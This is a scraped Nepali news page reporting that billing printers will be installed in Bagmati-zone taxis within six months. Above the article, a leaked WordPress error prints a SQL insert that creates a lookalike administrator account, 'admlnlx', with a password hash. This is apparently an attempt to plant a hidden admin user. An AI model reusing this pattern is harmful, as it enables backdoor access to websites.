WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BC/P7MBLq1KWseRzOC9/PDBEN7yLR6.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-23 14:10:03', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
सबै ट्याक्सीमा ६ महिनाभित्रै बिलिङ प्रणाली – Gaule Khabar

सबै ट्याक्सीमा ६ महिनाभित्रै बिलिङ प्रणाली

सबै ट्याक्सीमा ६ महिनाभित्रै बिलिङ प्रणाली

काठमाडौं, पुस १३–

सरकारले साउनको पहिलो साताभित्रै बागमती अञ्चलमा दर्ता भएका सबै ट्याक्सीमा बिलिङ प्रणालीका लागि आवश्यक प्रिन्टर मेसिन जडान गर्ने भएको छ।
मंसिर २३ गतेबाट बिलिङ प्रणाली सुरू गरे पनि नापतौल तथा गुणस्तर विभागको ट्याक्सी तथा टेम्पो एकाइले पुस १७ गतेबाट आलोपालो सिस्टम लगाउँदै प्रिन्टर मेसिन जडानका लागि समय तालिका सार्वजनिक गरेको आजको अन्नपूर्ण पोष्ट दैनिकमा खबर छ ।
एक सातामा पाँच सयवटा ट्याक्सीमा बिलिङ प्रणालीका लागि आवश्यक प्रिन्टर मेसिन गर्ने गरी तालिका प्रकाशन गरिएको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका